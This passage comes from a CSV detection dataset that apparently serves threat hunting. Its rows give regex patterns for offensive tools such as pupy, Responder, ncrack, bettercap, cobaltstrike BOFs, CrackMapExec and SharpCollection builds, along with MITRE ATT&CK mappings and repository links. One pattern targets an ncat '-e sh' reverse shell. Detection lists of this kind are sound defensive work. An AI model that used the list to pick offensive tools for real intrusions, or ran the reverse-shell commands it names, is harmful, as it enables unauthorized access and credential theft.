TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/nbnsspoof.py*",".{0,1000}\/nbnsspoof\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/nbstat.nse*",".{0,1000}\/nbstat\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/NBTNS.py*",".{0,1000}\/NBTNS\.py.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4355","1646","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*/nc_srv.bat",".{0,1000}\/nc_srv\.bat","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","1","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*/ncat * -e sh*",".{0,1000}\/ncat\s.{0,1000}\s\-e\ssh.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/nccgroup/nccfsas/*",".{0,1000}\/nccgroup\/nccfsas\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*/ncp-enum-users.nse*",".{0,1000}\/ncp\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ncp-serverinfo.nse*",".{0,1000}\/ncp\-serverinfo\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ncrack-*",".{0,1000}\/ncrack\-.{0,1000}","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","0","N/A","N/A","10","1016","233","2024-04-14T21:37:48Z","2015-12-21T23:48:00Z" "*/ncrack.git*",".{0,1000}\/ncrack\.git.{0,1000}","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","10","1016","233","2024-04-14T21:37:48Z","2015-12-21T23:48:00Z" "*/ndmp-fs-info.nse*",".{0,1000}\/ndmp\-fs\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ndmp-version.nse*",".{0,1000}\/ndmp\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ndp_spoof*",".{0,1000}\/ndp_spoof.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*/Needle_Sift_BOF/*",".{0,1000}\/Needle_Sift_BOF\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Strstr with user-supplied needle and filename as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Needle_Sift_BOF","1","1","N/A","10","10","30","7","2021-09-27T22:57:33Z","2021-09-27T20:13:10Z" "*/Nemesis.git*",".{0,1000}\/Nemesis\.git.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/nemesis_connector.py*",".{0,1000}\/nemesis_connector\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/nemesis_db.py*",".{0,1000}\/nemesis_db\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/nemesis_reg_collect_parser.py*",".{0,1000}\/nemesis_reg_collect_parser\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/nemesis-cli.py*",".{0,1000}\/nemesis\-cli\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/nessus.py*",".{0,1000}\/nessus\.py.{0,1000}","offensive_tool_keyword","crackmapexec","parser nessus.py from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*/nessus.rb*",".{0,1000}\/nessus\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/nessus-brute.nse*",".{0,1000}\/nessus\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/nessus-xmlrpc-brute.nse*",".{0,1000}\/nessus\-xmlrpc\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/net_4.0_32_RunasCs.exe*",".{0,1000}\/net_4\.0_32_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/net_4.0_32SharpDoor.exe*",".{0,1000}\/net_4\.0_32SharpDoor\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/net_4.0_32sharpfiles.exe*",".{0,1000}\/net_4\.0_32sharpfiles\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/net_4.0_64_RunasCs.exe*",".{0,1000}\/net_4\.0_64_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/net_4.0_64SharpDoor.exe*",".{0,1000}\/net_4\.0_64SharpDoor\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/net_4.0_64sharpfiles.exe*",".{0,1000}\/net_4\.0_64sharpfiles\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/net_4.0_Any_RunasCs.exe*",".{0,1000}\/net_4\.0_Any_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/net_4.0_AnySharpDoor.exe*",".{0,1000}\/net_4\.0_AnySharpDoor\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/net_4.0_Anysharpfiles.exe*",".{0,1000}\/net_4\.0_Anysharpfiles\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/net_4.5_32_RunasCs.exe*",".{0,1000}\/net_4\.5_32_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/net_4.5_32SharpDoor.exe*",".{0,1000}\/net_4\.5_32SharpDoor\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/net_4.5_32sharpfiles.exe*",".{0,1000}\/net_4\.5_32sharpfiles\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/net_4.5_64_RunasCs.exe*",".{0,1000}\/net_4\.5_64_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/net_4.5_64SharpDoor.exe*",".{0,1000}\/net_4\.5_64SharpDoor\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/net_4.5_64sharpfiles.exe*",".{0,1000}\/net_4\.5_64sharpfiles\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/net_4.5_Any_RunasCs.exe*",".{0,1000}\/net_4\.5_Any_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/net_4.5_AnySharpDoor.exe*",".{0,1000}\/net_4\.5_AnySharpDoor\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/net_4.5_Anysharpfiles.exe*",".{0,1000}\/net_4\.5_Anysharpfiles\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/net_4.7_32_RunasCs.exe*",".{0,1000}\/net_4\.7_32_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/net_4.7_64_RunasCs.exe*",".{0,1000}\/net_4\.7_64_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - 